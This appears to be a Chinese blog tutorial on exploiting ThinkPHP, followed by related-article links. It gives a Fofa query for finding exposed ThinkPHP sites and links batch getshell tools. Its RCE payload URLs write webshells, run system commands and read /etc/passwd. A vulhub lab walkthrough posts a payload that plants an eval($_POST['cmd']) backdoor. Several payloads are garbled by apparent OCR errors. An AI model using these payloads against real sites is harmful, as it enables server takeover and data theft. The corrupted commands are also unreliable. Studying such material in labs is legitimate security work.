15 ThinkPhp漏洞介绍及利用

简介: Thinkphp介绍Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开发的,所thinkphp出问题的话,会影响很多基于thinkphp开发的网站。


ThinkPhp应用

CMS已经搭建好的网站源码

 

 

Thinkphp历史漏洞

ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新版update注入漏洞 ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell ThinkPHP3.2.X_find_select_delete注入 ThinkPHP框架5.0.X_sql注入漏洞分析 ThinkPHP3.X_order_by注入漏洞 ThinkPHP5.X_order_by注入漏洞 ThinkPHP5.X 远程代码执行

 

 

Fofa收集特征

Thinkphph V5

"thinkphp"&& icon_hash="1165838194"&&country!="CNY

纯文本

 

输入/?s=1

出现错误

 

 

批量检测工具

https://github.com/Lucifer1993/TPscan
https://github.com/theLSA/tp5-getshell

 

 

 

 

ThinkPhp漏洞利用

5.0版本

| /index.php?s=index/Athink app/invokefunction&function=call user func array&vars[O]=system&vars[1]]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== |base64 -d >shell9.php

5.1版本

/index.php?s=index/Athinklapp/invokefunction&function=call_user_func_array&vars[0]=system&v ars[1][]=whoami /index.php?s=index/Athink\Request/input&filter=phpinfo&data=1/index.php?s=index/(think\Request/input&filter=system&data=id(dir Is) Gindex.php?s=indexAthink\template driver\file/write&cacheFile=shell.php&content=%3C?php%20 phpinfo0;?%3E /index.php?s=index/Athink\view driver\Php/display&content=%3C?php%20phpinfo0:?%3E /index.php?s=index/Athink\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&v ars[1]0=1

纯文本

 

 

 

 

 

漏洞复现

攻击机kaliip:

环境:vulhub-master

image.png

访问漏洞环境:


image.png 

 

输入?s=1

image.png


kali中查询thinkphppoc

searchsploit thinkphp


image.png

searchsploit -p 46150.txt
cat  path
路径



image.png



 

 

post提交数据

image.png



POST:/index.php?s=captcha
_method
=_construct&fiter[]=system&method=get&server[REQUESTMETHOD]=cat /etc/passwd

纯文本

 

 

 

写入一句话木马

POST:/index.php?s=captcha
_method
=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php
eval
(\$_POST['cmd']);?>">1.php


 

 

dock创建交互命令

docker esec -it id fa......./bin/bash


image.png



 

 

相关文章
|
7月前
|
安全 Linux PHP
【攻防世界】php_rce (ThinkPHP5)
【攻防世界】php_rce (ThinkPHP5)
|
安全 Linux PHP
#Thinkphp5.x漏洞
#Thinkphp5.x漏洞
82 0
|
安全 PHP
Thinkphp5.0.0-5.0.18 RCE分析
本篇文章基于thinkphp5.*框架,分析两种payload的构成以及执行流程
|
安全 调度 PHP
Thinkphp5.0.*之RCE漏洞分析
Thinkphp5.0.*之RCE漏洞分析
|
安全 网络协议 Unix
Thinkphp5 RCE 检测工具
Thinkphp5 RCE 检测工具
Thinkphp5 RCE 检测工具
|
安全 JavaScript
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析(二)
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析
316 0
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析(二)
|
安全 JavaScript 前端开发
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析(一)
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析
251 0
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析(一)
|
XML 自然语言处理 安全
Thinkphp-v6漏洞如何修复
ThinkPHP可以说是快捷、简易的面向对象编程的一个微服务架构,PHP前端框架开发,创建于2006年,遵照Apache2的开源协议进行对外开放,目的是为了快速WEB应用程序开发和优化企业应用软件开发而发展起来的。假如Thinkphp代码开启了多语言这个功能,hack就能通过POST、GET、COOKIES等方式将恶意参数插入进去发送到服务器中进行执行恶意代码,并目录穿越+文件包含,利用pearcmd文件含有这个trick就可以实现RCE远程代码执行漏洞。
332 0
Thinkphp-v6漏洞如何修复
|
开发框架 安全 PHP
ThinkPHP5 5.0.20 远程代码执行漏洞
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
1157 0
ThinkPHP5 5.0.20 远程代码执行漏洞
|
SQL 安全 关系型数据库
Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917
Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917
667 0
Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917